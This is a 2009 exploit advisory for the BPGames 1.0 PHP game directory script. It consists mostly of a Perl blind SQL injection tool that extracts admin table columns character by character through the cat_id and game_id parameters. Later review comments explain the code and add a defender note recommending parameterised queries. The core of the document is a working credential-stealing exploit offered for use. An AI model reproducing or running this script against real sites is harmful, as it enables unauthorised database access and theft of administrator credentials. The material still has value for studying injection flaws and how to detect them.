
BPGames 1.0 blind SQL Injection

#[x]===================================================================[x]
# |                     AntiSecurity[dot]org                            |
#[x]===================================================================[x]
# | Title               : BPGames 1.0 blind SQL Injection Exploit       |
# | Software            : BPGames                                       |
# | Vendor              : http://bpowerhouse.info                       |
# | Date                : 22 September 2009 ( Indonesia )               |
# | Author              : OoN_Boy                                       |
# | Contact             : oon.boy9@gmail.com                            |
# | Web                 : http://oonboy.info                            |
# | Blog                : http://oonboy.blogspot.com                    |
#[x]===================================================================[x]
# | Technology          : PHP                                           |
# | Database            : MySQL                                         |
# | Version             : 1.0                                           |
# | License             : GNU GPL                                       |
# | Price               : $29.90                                        |
# | Description         : is a game directory site script. The script   |
# |                       supports multi-language settings. Site users |
# |                       can search for games according to categories |
#[x]===================================================================[x]
# | Google Dork         : gwe ganteng :P                                |
#[x]===================================================================[x]
# | Exploit             : http://localhost/[path]/main.php?cat_id=[sql] |
# |                       http://localhost/[path]/game.php?game_id=[sql]|
# | Admin Page          : http://localhost/[path]/admin/index.php       |
#[x]===================================================================[x]
# | Greetz              : antisecurity.org batamhacker.or.id            |
# |                       Vrs-hCk NoGe Paman zxvf Angela Zhang aJe H312Y|
# |                       yooogy mousekill }^-^{ martfella noname s4va |
# |                       k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua |
# |                       Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny|
#[x]===================================================================[x]
  34
  35
use HTTP::Request;
use LWP::UserAgent;

# NOTE(review): this listing was extracted from a rendered document. The
# typographic quotes (’) and minus signs (−) that appear in the code below
# stand for ASCII ' and - in the original file; as printed it does not parse.
# NOTE(review): there is no `use strict` / `use warnings`, so every variable
# in this section is a package global. The subs further down read them
# directly ($target, $vuln, $id, $table, $columns, $string, $maxlen), which
# is why none of them can simply be made lexical.

$cmsapp   =   ’BPGames’;                              # only used in the banner
$vuln     =   ’main.php?cat_id=’; #change vuln game.php?game_id=
#vuln     =   ’game.php?game_id=’;
# $vuln is the script path plus query parameter that exploit() appends the
# injected predicate to (see the URL assembly in exploit()).
$string   =   ’Previous’;             #change if any string
#string   =   ’Instrucciones’;
# $string is the marker text whose presence in a response get_data() treats
# as "condition true"; it is interpolated into a regex without quoting.
$maxlen   =   32;                                     # max characters read per column

# $^O is the OS name; only used to pick the right "clear screen" command.
# Both system() calls use fixed literals, so no user data reaches a shell.
my $OS = "$^O";
if ($OS eq ’MSWin32’) { system("cls"); } else { system("clear"); }

# Banner. printf with an interpolated literal and no % directives; a plain
# print would state the intent more clearly. Note the string starts with
# "\n" followed by a literal newline, so two blank lines precede the name.
printf "\n
  $cmsapp
[x]=================================================[x]
 | BPGames 1.0 blind SQL Injection Exploit |
[x]=================================================[x]

\n";

# Operator input, taken verbatim with no validation. Each chomp strips the
# trailing newline; on EOF <STDIN> returns undef and the variable stays undef.
print   " [+] URL Path : "; chomp($web=<STDIN>);
print   " [+] Valid ID : "; chomp($id=<STDIN>);
print   " [+] Table : "; chomp($table=<STDIN>);                  #table name admins
print   " [+] Columns : "; chomp($columns=<STDIN>);              #column username and password

# Prefix the scheme when missing. The match is unanchored, so "http://"
# anywhere in the input counts, and a "/" is always appended — a path that
# already ends in "/" therefore yields "//" before $vuln.
if ($web =~ /http:\/\// ) { $target = $web."/"; } else { $target = "http://".$web."/"; }

print "\n\n [!] Exploiting $target ...\n\n";
# Ampersand call without parens passes the caller's current @_ through
# (empty at file scope); plain get_data() would be the clearer form.
&get_data;
print "\n\n [!] Mission completed.\n\n";
# Reconstructs, for each name in $columns, the first row's value of that
# column in $table one character at a time. For every position it asks
# exploit() about candidate characters and accepts the first one whose
# response matches /$string/; confirmed characters are echoed to STDOUT as
# they arrive.
#
# Reads package globals: $columns, $table, $maxlen, $string. Writes the
# package global $column, which exploit() reads — the foreach variable is
# deliberately not lexical, and a `my $column` here would silently break
# exploit(). The return value is meaningless and unused.
#
# Defender note: the traffic pattern is the tell — one GET per candidate per
# position, with SUBSTRING(...)=CHAR(n) for consecutive n in the query
# string. Presumably cat_id/game_id reach the SQL string unescaped (the
# header's "cat_id=[sql]"); parameterised queries or strict integer
# validation of those ids close the root cause.
sub get_data() {                       # empty prototype: no effect here
    @columns = split(/,/, $columns);   # "a,b" -> ("a","b"); no whitespace trimming
    foreach $column (@columns) {       # package global on purpose, see above
        print " [+] SELECT $column FROM $table LIMIT 0,1 ...\n";
        # Unbuffered write so the prompt shows before the first probe;
        # 255 is merely an upper bound, the string is much shorter.
        syswrite(STDOUT, " [−] $table\@$column> ", 255);
        # $i is 1-based to match SQL SUBSTRING positions (see exploit()).
        for (my $i=1; $i<=$maxlen; $i++) {
            my $chr = 0;       # becomes 1 once a character is confirmed at $i
            my $found = 0;     # always equal to $chr below; effectively redundant
            my $char = 48;     # first pass: ASCII '0'..'9'
            while (!$chr && $char<=57) {
                if(exploit($i,$char) =~ /$string/) {
                    $chr = 1;
                    $found = 1;
                    syswrite(STDOUT,chr($char),1);   # echo confirmed character
                } else { $found = 0; }               # no-op: already 0
                $char++;
            }
            if(!$chr) {
                $char = 97;    # second pass: ASCII 'a'..'z'
                while(!$chr && $char<=122) {
                    if(exploit($i,$char) =~ /$string/) {
                        $chr = 1;
                        $found = 1;
                        syswrite(STDOUT,chr($char),1);
                    } else { $found = 0; }
                    $char++;
                }
            }
            # No candidate matched at this position: the column is treated
            # as complete (the candidate set is only digits and lowercase
            # letters, so any other character also ends it here).
            if (!$found) {
                print "\n"; last;
            }
        }
    }
}
  102
# Builds one probe URL for character position $limit and candidate ASCII
# code $chars of the current $column, fetches it and returns the page body.
# The appended predicate compares SUBSTRING(col, $limit, 1) with
# CHAR($chars); the caller (get_data) decides true/false by searching the
# returned content for $string.
#
# Reads package globals: $column (set by get_data's loop), $table, $target,
# $vuln, $id. $id is used exactly as typed. Any HTTP error does not return
# here — get_content() exits the whole script.
sub exploit() {
    my $limit = $_[0];     # 1-based position, SQL SUBSTRING semantics
    my $chars = $_[1];     # ASCII code of the candidate character
    # '+' stands for a URL-encoded space; nothing else is encoded.
    my $blind = ’+AND+SUBSTRING((SELECT+’.$column.’+FROM+’.$table.’+LIMIT+0,1),’.$limit.’,1)=CHAR(’.$chars.’)’;
    my $inject = $target.$vuln.$id.$blind;   # base URL . script?param= . id . predicate
    my $content = get_content($inject);
    return $content;
}
  111
  112   sub get_content() {
  113            my $url = $_[0];
  114            my $req = HTTP::Request−>new(GET => $url);
  115            my $ua = LWP::UserAgent−>new();
  116            $ua−>timeout(5);
  117            my $res = $ua−>request($req);
  118            if ($res−>is_error){
  119                     print "\n\n [!] Error, ".$res−>status_line.".\n\n";
  120                     exit;
  121            }
  122            return $res−>content;
  123   }
  124
  125   # Exploit End



